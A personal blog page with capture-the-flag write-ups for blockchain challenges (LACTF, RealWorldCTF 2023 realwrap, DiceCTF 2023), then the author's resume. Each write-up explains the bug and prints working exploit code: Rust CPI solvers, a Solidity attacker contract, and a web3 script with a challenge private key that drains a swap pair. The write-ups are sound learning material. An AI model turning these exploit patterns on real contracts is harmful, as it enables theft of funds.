        space = 8 + std::mem::size_of::<SailorUnion>(),
        seeds = [b"union", authority.key.as_ref()],
        bump
    )]
    sailor_union: Account<'info, SailorUnion>,
    #[account(mut)]
    authority: Signer<'info>,
    #[account(mut, seeds = [b"vault"], bump)]
    vault: SystemAccount<'info>,
    system_program: Program<'info, System>,
}

#[account]
pub struct SailorUnion {
    available_funds: u64,
    authority: Pubkey,
}

create_union() register for sailor_union's information that what authority, vault and system_program.

In this process, authority pay some lamports to vault but available_funds is set by zero.

    pub fn pay_dues(ctx: Context<PayDues>, amt: u64) -> Result<()> {
        msg!("paying dues {}", amt);

        if ctx.accounts.member.lamports() >= amt {
            ctx.accounts.sailor_union.available_funds += amt;
            transfer(&ctx.accounts.authority, &ctx.accounts.vault, amt, &[])?;
            Ok(())
        } else {
            msg!(
                "insufficient funds, have {} but need {}",
                ctx.accounts.member.lamports(),
                amt
            );
            Err(ProgramError::InsufficientFunds.into())
        }
    }

#[derive(Accounts)]
pub struct PayDues<'info> {
    #[account(mut)]
    sailor_union: Account<'info, SailorUnion>,
    member: SystemAccount<'info>,
    #[account(mut)]
    authority: Signer<'info>,
    #[account(mut, seeds = [b"vault"], bump)]
    vault: SystemAccount<'info>,
    system_program: Program<'info, System>,
}

pay_dues() make authority pay some lamports to vault.

    pub fn strike_pay(ctx: Context<StrikePay>, amt: u64) -> Result<()> {
        msg!("strike pay {}", amt);

        let (_, vault_bump) = Pubkey::find_program_address(&[b"vault"], &ID);

        if ctx.accounts.sailor_union.available_funds >= amt {
            ctx.accounts.sailor_union.available_funds -= amt;
            transfer(
                &ctx.accounts.vault,
                &ctx.accounts.member,
                amt,
                &[&[b"vault", &[vault_bump]]],
            )?;
            Ok(())
        } else {
            msg!(
                "insufficient funds, have {} but need {}",
                ctx.accounts.sailor_union.available_funds,
                amt
            );
            Err(ProgramError::InsufficientFunds.into())
        }
    }

#[derive(Accounts)]
pub struct StrikePay<'info> {
    #[account(mut)]
    sailor_union: Account<'info, SailorUnion>,
    #[account(mut)]
    member: SystemAccount<'info>,
    authority: Signer<'info>,
    #[account(mut, seeds = [b"vault"], bump)]
    vault: SystemAccount<'info>,
    system_program: Program<'info, System>,
}

Until now anyone pay some lamprots to vault.

At this time, strike_pay() make vault transfer some amount to member.

Root cause

Do you wonder difference between member and authority in Account Struct?

At create_union(), it fixed who authority is.

For union's logic, I think the only account(public key) that has authority could call pay_dues() and strike_pay().

In pay_dues()

        if ctx.accounts.member.lamports() >= amt {
            ctx.accounts.sailor_union.available_funds += amt;
            transfer(&ctx.accounts.authority, &ctx.accounts.vault, amt, &[])?;

First of all, they check the balance of member but they withdraw some lamports from authority.

To do this, it needs assumption member == authority but they do not check it.

Although before invoke_signed() transfer() function checks balance of from > amt, transfer() do not generate any error so sailor_union.available_funds still increase.

    if from.lamports() >= amt {
        invoke_signed(
            &system_instruction::transfer(from.key, to.key, amt),
            &[from.clone(), to.clone()],
            signers,
        )?;
    }
    Ok(())

In strike_pay()

        if ctx.accounts.sailor_union.available_funds >= amt {
            ctx.accounts.sailor_union.available_funds -= amt;
            transfer(
                &ctx.accounts.vault,
                &ctx.accounts.member,
                amt,
                &[&[b"vault", &[vault_bump]]],
            )?;

They do no check member is union's member.

So anyone that do not enroll union could call strike_pay().

To fix this, we would add if sailor_unior.authority == member to that.

In short, attacker increase sailor_union.available_funds by pay_dues() and withdraw 1_000_000 lamports from vault by strike_pay().

Although anyone can easily find vulnerability, writing the exploit code was more challenging.

Solve

Let me first explain my wrong approach.

In IdekCTF and DiceCTF, there are solana challenges.

They are solved by using Anchor. https://www.anchor-lang.com/

I thought that I could solve this chall with Anchor as well.

So I wrote following code. https://gist.github.com/kangsangsoo/d30f154cba6b471e510b6fda556a983e

I ran solve.py and got error: "The declared program id does not match the actual program id."

Aplet123

Triacontakai

explaind to me why my approach is incorrect.

this chall used https://github.com/otter-sec/sol-ctf-framework/tree/main

other chall used https://github.com/otter-sec/sol-ctf-framework/tree/rewrite-v2

this chall generate program key by https://github.com/otter-sec/sol-ctf-framework/blob/main/src/lib.rs#L84

other chall generate program key by https://github.com/otter-sec/sol-ctf-framework/blob/rewrite-v2/src/lib.rs#L80

Therefore, it is impossible that my solve.so's program ID is equal to program key that this chall generates.

the 8 byte instruction thing is only an anchor thing that it uses to determine which instruction handler to route it to
but normal solana programs always send the instruction data to process_instruction

In normal case, check https://docs.rs/solana-program/latest/solana_program/

#[cfg(not(feature = "no-entrypoint"))]
pub mod entrypoint {
    use solana_program::{
        account_info::AccountInfo,
        entrypoint,
        entrypoint::ProgramResult,
        pubkey::Pubkey,
    };

    entrypoint!(process_instruction);

    pub fn process_instruction(
        program_id: &Pubkey,
        accounts: &[AccountInfo],
        instruction_data: &[u8],
    ) -> ProgramResult {
        // Decode and dispatch instructions here.
        todo!()
    }
}

To call pay_dues(), strike_pay(), we use CPI via Anchor that is convenient.

https://www.anchor-lang.com/docs/cross-program-invocations

add to cargo.toml

sailor = {path = "../chall", features = ["cpi"], version = "0.1.0"}

First, we create ctx via CpiContext::new()

https://docs.rs/anchor-lang/latest/src/anchor_lang/context.rs.html#179-186

Next, just call

cargo build-bpf

copy /targeat/depoly/solve.so

lib.rs

#[cfg(not(feature = "no-entrypoint"))]
pub mod entrypoint {
    use solana_program::{
        account_info::AccountInfo,
        entrypoint,
        entrypoint::ProgramResult,
        pubkey::Pubkey,
    };
    use anchor_lang::prelude::*;

    entrypoint!(process_instruction);

    pub fn process_instruction(
        program_id: &Pubkey,
        accounts: &[AccountInfo],
        instruction_data: &[u8],
    ) -> ProgramResult {
        let program = accounts[0].clone();
        let user = accounts[1].clone();
        let vault = accounts[2].clone();
        let sailor_union = accounts[3].clone();
        let rich_boi = accounts[4].clone();
        let system_program = accounts[5].clone();
    

        let cpi_accounts = sailor::cpi::accounts::PayDues {
            sailor_union: sailor_union.clone(),
            member: rich_boi.clone(),
            authority: user.clone(),
            vault: vault.clone(),
            system_program: system_program.clone()
        };
        let cpi_ctx = CpiContext::new(program.clone(), cpi_accounts);

        sailor::cpi::pay_dues(cpi_ctx, 100_000_000);

        let cpi_accounts2 = sailor::cpi::accounts::StrikePay {
            sailor_union: sailor_union.clone(),
            member: user.clone(),
            authority: user.clone(),
            vault: vault.clone(),
            system_program: system_program.clone()
        };
        let cpi_ctx2 = CpiContext::new(program.clone(), cpi_accounts2);

        sailor::cpi::strike_pay(cpi_ctx2, 100_000_000);

        Ok(())        
    }
}

lactf{anchor_cant_protect_me_from_my_own_stupidity}

RealWorldCTF 2023 - blockchain(realwrap)

gss1 — Thu, 9 Feb 2023 16:07:24 +0900

I thought RealWorldCTF was difficult, but it was such a good experience to solve one challenge.

I found a way to expoit, but I didn't know how to use web3 so I had a hard time.

readme

WETH on Ethereum is too cumbersome! I'll show you what is real Wrapped ETH by utilizing precompiled contract, it works like a charm especially when exchanging ETH in a swap pair. And most important, IT IS VERY SECURE!

nc 47.254.91.104 20000

faucet: http://47.254.91.104:8080

RPC(geth v1.10.26 with realwrap patch): http://47.254.91.104:8545

https://github.com/chaitin/Real-World-CTF-5th-Challenges/tree/main/realwrap

Root Cause

https://pwning.mirror.xyz/okyEG4lahAuR81IMabYL5aUdvAsZ8cRCbYBXh8RHFuE

geth_v1.10.26_precompiled.diff

ETH can work like WETH by using a precompiled contract.

It's possible to confirm if the functions work by calling them to the WETH address.

+var (
+	functions = map[string]RunStatefulPrecompileFunc{
+		calculateFunctionSelector("name()"):                                 metadata("name"),
+		calculateFunctionSelector("symbol()"):                               metadata("symbol"),
+		calculateFunctionSelector("decimals()"):                             metadata("decimals"),
+		calculateFunctionSelector("balanceOf(address)"):                     balanceOf,
+		calculateFunctionSelector("transfer(address,uint256)"):              transfer,
+		calculateFunctionSelector("transferAndCall(address,uint256,bytes)"): transferAndCall,
+		calculateFunctionSelector("allowance(address,address)"):             allowance,
+		calculateFunctionSelector("approve(address,uint256)"):               approve,
+		calculateFunctionSelector("transferFrom(address,address,uint256)"):  transferFrom,
+	}
+	realWrappedEtherAddr = common.HexToAddress("0x0000000000000000000000000000000000004eA1")

If you look at the implementation of the functions, you will find that there is a problem in calculating the storage location.

+func approve(evm *EVM, caller common.Address, input []byte, suppliedGas uint64, readOnly bool) (ret []byte, remainingGas uint64, err error) {
+	if evm.interpreter.readOnly {
+		return nil, suppliedGas, ErrWriteProtection
+	}
+	inputArgs := &ApproveInput{}
+	if err = unpackInputIntoInterface(inputArgs, "approve", input); err != nil {
+		return nil, suppliedGas, err
+	}
+
+	return approveInternal(evm, suppliedGas, caller, inputArgs.Spender, inputArgs.Amount)
+}
+func approveInternal(evm *EVM, suppliedGas uint64, owner, spender common.Address, value *big.Int) (ret []byte, remainingGas uint64, err error) {
+	if remainingGas, err = deductGas(suppliedGas, params.Keccak256Gas*2); err != nil {
+		return nil, 0, err
+	}
+	loc := calculateAllowancesStorageSlot(owner, spender)
+
+	if remainingGas, err = deductGas(suppliedGas, params.SstoreSetGas); err != nil {
+		return nil, 0, err
+	}
+
+	evm.StateDB.SetState(realWrappedEtherAddr, loc, common.BigToHash(value))
+	return math.PaddedBigBytes(common.Big1, common.HashLength), remainingGas, nil
+}

approve(owner, spender, amount) call approveInternal(owner, spender, amount).

approveInternal() has following code to execute allowance[owner][spedner] = amount.

loc := calculateAllowancesStorageSlot(owner, spender)

In ERC20 token..

If the approve function is called by delegatecall, the caller's context remains unchanged, so the caller can not access the allowance.

But precompiled contract does not check that is it staticcall or delegatecall?

=> approve(WETH, me, infinity)

I got the infinity allowance of anyone by uniswap pair →(call) uniswapV2Call →(delegatecall) precompiled

Next, transferAndCall(to, amount, data) function can make call(data)

+func transferAndCall(evm *EVM, caller common.Address, input []byte, suppliedGas uint64, readOnly bool) (ret []byte, remainingGas uint64, err error) {
+	if readOnly {
+		return nil, suppliedGas, ErrWriteProtection
+	}
+	inputArgs := &TransferAndCallInput{}
+	if err = unpackInputIntoInterface(inputArgs, "transferAndCall", input); err != nil {
+		return nil, suppliedGas, err
+	}
+
+	if ret, remainingGas, err = transferInternal(evm, suppliedGas, caller, inputArgs.To, inputArgs.Amount); err != nil {
+		return ret, remainingGas, err
+	}
+
+	code := evm.StateDB.GetCode(inputArgs.To)
+	if len(code) == 0 {
+		return ret, remainingGas, nil
+	}
+
+	snapshot := evm.StateDB.Snapshot()
+	evm.depth++
+	defer func() { evm.depth-- }()
+
+	if ret, remainingGas, err = evm.Call(AccountRef(caller), inputArgs.To, inputArgs.Data, remainingGas, common.Big0); err != nil {
+		evm.StateDB.RevertToSnapshot(snapshot)
+		if err != ErrExecutionReverted {
+			remainingGas = 0
+		}
+	}
+
+	return ret, remainingGas, err
+}

My call context(msg.sender) is setted uniswap pair in simple Token. => approve(uniswap pair, me, infinity)

I got all of simple token that uniswap pair has

by uniswap pair →(call) uniswapV2Call →(delegatecall) precompiled →(evm.Call) simpleToken

Exploit

contract Attacker{
	address WETH = 0x0000000000000000000000000000000000004eA1;
  address my = 0x1A422f86D5381E84b01907ddF0E53fa9A6B2a3B3;
  address pair = 0x329c2258ff58a97f808571c20628fAa19E6Ca1Ed;
  address token1 = 0x540E136cBeDf274aa65FFb1A5De5454Bbb56EFd1;
	function uniswapV2Call(
        address sender,
        uint256 amount0,
        uint256 amount1,
        bytes calldata data
    ) external {
        (bool succc, ) = WETH.delegatecall(abi.encodeWithSignature("approve(address,uint256)", my, 100 ether));
        require(succc == true, "?");
        (bool succcc, ) = WETH.delegatecall(abi.encodeWithSignature("transferAndCall(address,uint256,bytes)", token1, 0.1 ether, abi.encodeWithSignature("approve(address,uint256)", my, 100 ether)));
        require(succc == true, "?");
    }
}

import json
from web3 import Web3
from solc import compile_source
w3 = Web3(Web3.HTTPProvider("http://47.254.91.104:8545"))

#Check Connection
t=w3.isConnected()
print(t)

# Get private key 
prikey =  '0x126ed23464f5f3f03352fa6cad4731712fc896162711f9a1e04e7d982a6d7635'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x1A422f86D5381E84b01907ddF0E53fa9A6B2a3B3

myAddr = "0x1A422f86D5381E84b01907ddF0E53fa9A6B2a3B3"

def transfer(erc20, to: str, amount: int):
    f = open('erc20_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=erc20, abi=abi)
    func_call = contract.functions["transfer"](to, amount).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def swap(pair, out1:int, out2:int, to:str):
    f = open('pair_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=pair, abi=abi)
    func_call = contract.functions["swap"](out1, out2, to, b"1"*32).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def transferFrom(_token: str, _from: str, _to: str, _amount: int):
    f = open('erc20_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=_token, abi=abi)
    func_call = contract.functions["transferFrom"](_from, _to, _amount).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def approve():
    WETH = "0x0000000000000000000000000000000000004eA1"
    pair = "0xcd2b747e7f620224274Eb9BfC8669D8C2CAF914d"
    token1 = "0xd80A0eFdC40C532C5506623F1786a1a8F557f51a"
    f = open('erc20_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=token1, abi=abi)
    func_call = contract.functions["approve"](pair, 10**18).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)


def createAttack():
    f = open("attack_abi", "r")
    erc20_abi= f.read()
    f.close()
    f = open("attack_bytecode", "r")
    erc20_bytecode= f.read()
    f.close()

    simpleToken = w3.eth.contract(abi=erc20_abi, bytecode=erc20_bytecode)
    transaction = simpleToken.constructor().buildTransaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")

def sync(_pair):
    f = open('pair_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=_pair, abi=abi)
    func_call = contract.functions["sync"]().buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)


WETH = "0x0000000000000000000000000000000000004eA1"
FACTORY = "0xd179bc7A30de61485665Bd5ebC628B9bCC4FFf94"
PAIR = "0x329c2258ff58a97f808571c20628fAa19E6Ca1Ed"
SIMPLETOKEN = "0x540E136cBeDf274aa65FFb1A5De5454Bbb56EFd1"
ATTACK = "0x94F5e5619DEFfEB06fc6a4Da4b494fd3bA62E0b7"


createAttack()

ATTACK = input("attacker contract address: ")

transfer(WETH, PAIR, int(0.4 * 10**18))
swap(PAIR, 0, 50, ATTACK)
transferFrom(SIMPLETOKEN, PAIR, myAddr, 100 * 10 ** 18 - 50)
transferFrom(WETH, PAIR, myAddr, int(1.4 * 10**18))
sync(PAIR)

rwctf{pREcOmpilEd_m4st3r_5TolE_mY_M0ney}

DiceCTF 2023 - pwn(Baby-Solana, OtterWorld)

gss1 — Tue, 7 Feb 2023 13:46:41 +0900

Five months ago, I started studying and having interest in blockchain.

In RealWorld CTF, Idek CTF, I solved some blockchain challenges.

I didn't expect blockchain challenges because there was no blockchain category in DiceCTF.

However, when I looked at the names of challs, I realized there were blockchain challs!!.

After a lot of trial and error, I solved both of the blockchain challs!

I will write a write-up about how I approached and solved problems from a beginner's perspective in rust and solana.

Environment

https://github.com/otter-sec/sol-ctf-framework

Recently encountered challs used this framework.

When you look at the chall files, you can see that there are framework and framework-solve folders.

/framework/src/main.rs

/framework/chall/programs/chall/src/lib.rs

/framework-solve/src/main.rs

/framework-solve/chall/programs/chall/src/lib.rs

In most cases, examining these four files will be sufficient to understand the given challenge.

How do I connect the remote server?

In /framework-solve/src/main.rs

let mut stream = TcpStream::connect("127.0.0.1:8080")?;

However, DiceCTF provided SSL connection.

https://klodd.tjcsec.club/how-to/#tcp-challenges

For example, socat tcp-listen:8080,fork,reuseaddr openssl:babyheapng-e20d62127bb9434b.tjc.tf:1337

How I test in local environment?

/framework/Dockerfile

/run.sh

/setup.sh

Building takes quite a bit of time.

Baby-Solana

Analysis

When looking at the /framework/src/main.rs without paying attention to the code necessary for setting up the environment

The variable 'x' is initialized to 1_000_000 and 'y' to 1_000_001

    let ix = chall::instruction::InitVirtualBalance {
        x: 1_000_000,
        y: 1_000_001,
    };

And, user's inputs are executed.

    writeln!(socket, "user: {}", user)?;

    let solve_ix = chall.read_instruction(solve_id)?;
    println!("{:?}", solve_ix);

    println!("start");
    chall
        .run_ixs_full(&[solve_ix], &[&user_keypair], &user_keypair.pubkey())
        .await?;
    println!("end");

Finally, if x == 0 and y == 0, then print flag!

    let flag = Pubkey::find_program_address(&[FLAG_SEED], &chall_id).0;

    if let Some(acct) = chall.ctx.banks_client.get_account(flag).await? {
        let state = bytemuck::from_bytes::<chall::State>(
            &acct.data[8..std::mem::size_of::<chall::State>() + 8],
        );
        if state.x == 0 && state.y == 0 {
            writeln!(socket, "congrats!")?;
            if let Ok(flag) = env::var("FLAG") {
                writeln!(socket, "flag: {:?}", flag)?;
            } else {
                writeln!(socket, "flag not found, please contact admin")?;
            }
        }
    }

To find operations with variable x and y, I looked at /framework/chall/programs/chall/src/lib.rs.

    pub fn swap(ctx: Context<Swap>, amt: NUMBER) -> Result<()> {
        let state = &mut ctx.accounts.state.load_mut()?;

        state.x += amt;
        state.y += amt;

        state.x += state.fee * state.x / 100;
        state.y += state.fee * state.y / 100;

        Ok(())
    }

It seems we can set the state to 0 by putting a negative value into amt, since amt is declared as NUMBER(i64) type.

1. swap(-1_000_000) => x=0, y=1

2. set state.fee = -100

3. swap(0) => x=0, y=0

The ability to modify the value of state.fee can be solution.

/framework/chall/programs/chall/src/lib.rs

    pub fn set_fee(ctx: Context<AuthFee>, fee: NUMBER) -> Result<()> {
        let state = &mut ctx.accounts.state.load_mut()?;

        state.fee = fee;

        Ok(())
    }
    
...
    
#[derive(Accounts)]
pub struct AuthFee<'info> {
    #[account(mut,
        constraint = (state.load().unwrap().owner.is_some() && 
            state.load().unwrap().owner.unwrap() == payer.key()
        ) || 
        (state.load().unwrap().fee_manager.is_some() && (
            state.load().unwrap().fee_manager.unwrap().timestamp < Clock::get()?.unix_timestamp && 
            (
                state.load().unwrap().fee_manager.unwrap().authority.is_none() || 
                state.load().unwrap().fee_manager.unwrap().authority.unwrap() == payer.key()
            )
        ))
    )]
    pub state: AccountLoader<'info, State>,
    #[account(mut)]
    pub payer: Signer<'info>,
    pub system_program: Program<'info, System>,
    pub rent: Sysvar<'info, Rent>,
}

In order to call set_fee(), we need to pass the constraint in struct AuthFee.

Our account can bypass second conditon.

        (state.load().unwrap().fee_manager.is_some() && (
            state.load().unwrap().fee_manager.unwrap().timestamp < Clock::get()?.unix_timestamp && 
            (
                state.load().unwrap().fee_manager.unwrap().authority.is_none() || 
                state.load().unwrap().fee_manager.unwrap().authority.unwrap() == payer.key()
            )
        ))

Solution

Add the following code to /framework-solve/chall/programs/chall/src/lib.rs

    pub fn get_flag(_ctx: Context<GetFlag>) -> Result<()> {
        let cpi_accounts = chall::cpi::accounts::Swap {
            state: _ctx.accounts.state.to_account_info(),
            payer: _ctx.accounts.payer.to_account_info(),
            system_program: _ctx.accounts.system_program.to_account_info(),
            rent: _ctx.accounts.rent.to_account_info(),
        };
        let cpi_ctx = CpiContext::new(_ctx.accounts.chall.to_account_info(), cpi_accounts);
        chall::cpi::swap(cpi_ctx, -1_000_000)?;

        let cpi_accounts5 = chall::cpi::accounts::AuthFee {
            state: _ctx.accounts.state.to_account_info(),
            payer: _ctx.accounts.payer.to_account_info(),
            system_program: _ctx.accounts.system_program.to_account_info(),
            rent: _ctx.accounts.rent.to_account_info(),
        };
        let cpi_ctx5 = CpiContext::new(_ctx.accounts.chall.to_account_info(), cpi_accounts5);
        chall::cpi::set_fee(cpi_ctx5, -100)?;

        let cpi_accounts6 = chall::cpi::accounts::Swap {
            state: _ctx.accounts.state.to_account_info(),
            payer: _ctx.accounts.payer.to_account_info(),
            system_program: _ctx.accounts.system_program.to_account_info(),
            rent: _ctx.accounts.rent.to_account_info(),
        };
        let cpi_ctx6 = CpiContext::new(_ctx.accounts.chall.to_account_info(), cpi_accounts6);
        chall::cpi::swap(cpi_ctx6, 0)?;

        Ok(())
    }

And get Intancer

e.g. socat tcp-listen:8080,fork,reuseaddr openssl:babyheapng-e20d62127bb9434b.tjc.tf:1337

Run run.sh

dice{z3r0_c0py_h3r0_c0py_cPDsolK8}

OtterWorld

Analysis

When looking at the /framework/src/main.rs without paying attention to the code necessary for setting up the environment

First, user's inputs are executed.

    let solve_ix = chall.read_instruction(solve_id)?;
    println!("{:?}", solve_ix);

    println!("start");
    chall
        .run_ixs_full(
            &[solve_ix],
            &[&user_keypair],
            &user_keypair.pubkey(),
        )
        .await?;
    println!("end");

And, if the account exists, it will print the flag.

That means I should create my account.

    let flag = Pubkey::find_program_address(&[FLAG_SEED], &chall_id).0;

    if let Some(_) = chall.ctx.banks_client.get_account(flag).await? {
        writeln!(socket, "congrats!")?;
        if let Ok(flag) = env::var("FLAG") {
            writeln!(socket, "flag: {:?}", flag)?;
        } else {
            writeln!(socket, "flag not found, please contact admin")?;
        }
    }

/framework/chall/programs/chall/src/lib.rs

#[derive(Accounts)]
pub struct GetFlag<'info> {
    #[account(
        init,
        seeds = [ FLAG_SEED ],
        bump,
        payer = payer,
        space = 1000
    )]
    pub flag: Account<'info, Flag>,

    #[account(
        constraint = password.key().as_ref()[..4] == b"osec"[..]
    )]
    pub password: AccountInfo<'info>,

    #[account(mut)]
    pub payer: Signer<'info>,
    pub system_program: Program<'info, System>,
    pub rent: Sysvar<'info, Rent>,
}

To create an account, a password is required that starts with b"osec".

Solution

Initially, I thought I had to find the private key that could generate a pubkey that satisfies the condition.

However, this is not a feasible solution when considering time complexity.

The next thought was the program ID.

/framework/chall/programs/chall/src/lib.rs

/framework-solve/chall/programs/chall/src/lib.rs

Look at the top of code

declare_id!("osecio1111111111111111111111111111111111111");

It is a pubkey of chall id.

Therefore, I thought that if I just passed the pubkey as the password, it would be over.

/framework-solve/chall/programs/chall/src/lib.rs

    pub fn get_flag(_ctx: Context<GetFlag>) -> Result<()> {        
        let cpi_accounts = chall::cpi::accounts::GetFlag {
            flag: _ctx.accounts.state.to_account_info(),
            password: _ctx.accounts.chall.to_account_info(),
            payer: _ctx.accounts.payer.to_account_info(),
            system_program: _ctx.accounts.system_program.to_account_info(),
            rent: _ctx.accounts.rent.to_account_info(),
        };
       
        let cpi_ctx = CpiContext::new(_ctx.accounts.chall.to_account_info(), cpi_accounts);
        chall::cpi::get_flag(cpi_ctx)?;
        Ok(())
    }

But, it was wrong.

In fact, pubkey string is not byte string but output of base58 encoding.

So "osecio1111111111111111111111111111111111111"[:4] can not pass b"osec"

Finally, I thought that if I just input Pubkey I wanted and pass it as the password, it would be the end.

I learned how to generate a public key through a Google.

let key = Pubkey::new(&[111,115,101,99,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]);
// key = b"osec"

But I didn't know how to convert this Pubkey into an AccountInfo.

pub password: AccountInfo<'info>,

While I was pondering...

I found a similar case of ???? into an AccountInfo type conversion in /framework-solve/src/main.rs .

    let mut ix_accounts = solve::accounts::GetFlag {
        state,
        payer: user,
        token_program: spl_token::ID,
        chall: chall_id,
        system_program: solana_program::system_program::ID,
        rent: solana_program::sysvar::rent::ID,
    };

So I decided to experiment with it.

I added test which has type of AccountInfo to /framework-solve/chall/programs/chall/src/lib.rs

#[derive(Accounts)]
pub struct GetFlag<'info> {
    #[account(mut)]
    pub state: AccountInfo<'info>,
    #[account(mut)]
    pub payer: Signer<'info>,

    pub system_program: Program<'info, System>,
    pub token_program: Program<'info, Token>,
    pub rent: Sysvar<'info, Rent>,
    pub chall: Program<'info, chall::program::Chall>,

    #[account(mut)]
    pub test: AccountInfo<'info>, // added
}

I created Pubkey and assign it.

/framework-solve/src/main.rs

    let test = Pubkey::new(&[111,115,101,99,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]); 
    //added

    let mut ix_accounts = solve::accounts::GetFlag {
        state,
        payer: user,
        token_program: spl_token::ID,
        chall: chall_id,
        system_program: solana_program::system_program::ID,
        rent: solana_program::sysvar::rent::ID,
        test: test, // added
    };

Add following code makeing my account to /framework-solve/chall/programs/chall/src/lib.rs

    pub fn get_flag(_ctx: Context<GetFlag>) -> Result<()> {
        let cpi_accounts = chall::cpi::accounts::GetFlag {
            flag: _ctx.accounts.state.to_account_info(),
            password: _ctx.accounts.test.to_account_info(),
            payer: _ctx.accounts.payer.to_account_info(),
            system_program: _ctx.accounts.system_program.to_account_info(),
            rent: _ctx.accounts.rent.to_account_info(),
        };
       
        let cpi_ctx = CpiContext::new(_ctx.accounts.chall.to_account_info(), cpi_accounts);
        chall::cpi::get_flag(cpi_ctx)?;
        Ok(())
    }

And get Intancer

e.g. socat tcp-listen:8080,fork,reuseaddr openssl:babyheapng-e20d62127bb9434b.tjc.tf:1337

And run run.sh.

Surprisingly, I got the flag.

dice{0tt3r_w0r1d_8c01j3}

It is actually very simple once it was solved, but it was difficult because I didn't know Rust or Solana.

I think I need to study each chapter one by one.

https://solanacookbook.com/kr/core-concepts/accounts.html#facts

If you are looking for similar difficulty solana challs, I recommend baby blockchain 1,2,3 of IdekCTF 2023.

Thanks.

about me

gss1 — Tue, 7 Feb 2023 02:51:02 +0900

sangsoo_resume_feb.pdf

0.04MB

Information

rkdtkdtn0706@gmail.com

https://github.com/kangsangsoo

https://github.com/godsangsoo

https://www.acmicpc.net/user/rkdtkdtn0706

https://x.com/gosasu1

Experience

Complete Military service at the 32nd Infantry Division (2018. 04. ~ 2019. 12.)
2021 Korea University Collegiate Programming Contest organizer
2022 SKH(숭고한) spring camp organizer
CyKor member (2022.03. ~)
Alkor president (2022.03. ~ 2023.02.)
Best Of the Best 11th, vulnerability analysis(2022.07. ~ 2023.03.)
- https://github.com/scv-bob11
OtterSec, baby otter (2023.04. ~)

Achievement

2021 Crypto Analysis Contest general division | Excellence Award | “강상수”
2022 Zer0pts | 3rd | "CyKor"
2022 WACon | general division | 7th | “종강한 개 강한 대학생”
2022 Hacktheon | 12th | “@everyone”
2022 SSTF | 4th | “CyKor”
2022 Crypto Analysis Contest | general division | Excellence Award | “constant”
2022 CCE qual | general division | 16th | “개강한 개 강한 대학생”
2022 Codegate | university division | 8th | ‘roKyC’
2023 Zer0pts | 2nd | "CyKor"
2023 SSTF | 3rd | "Cy + Kr"
2023 Crypto Analysis Contest | general division | Excellence Award | “const”
2023 Paradigm CTF | 2nd | "KALOS++"
2023 HITCON CTF | 4th | "프로그램털모찌"
2023 Glacier CTF | Academic Division | 2nd | "CyKor"
2024 MoveCTF | 3rd | "cesretto"
2024 openzeppelin ctf | 7th | "HOT TAMALES"
2024 DEFCON 32 qual | 6th | "Cold Fusion"
2024 Dreamhack Invitational Finalist | "gss1"
2024 HITCON CTF qual | 6th | "Cold Fusion"
2024 DEFCON 32 final | 9th | "Cold Fusion"
2024 codegate final | 13th | "Thehackerscrew"
2024 Fuzzland CTF | 1st | "KimchiPremium"
2024 HITCON CTF final | 6th | "Cold Fusion"
2024 SCAN CTF final | 3rd | "Tornado Cats"
2025 Remedy CTF | 3rd | "KimchiPremium"
2025 Codegate qual | 3rd | "졸업수료초과재학"
2025 DEFCON 33 qual | 8th | "Cold Fusion"
2025 LakeCTF fianl | 6th | "CyKor"
2025 Codegate final | 8th | "졸업수료초과재학"
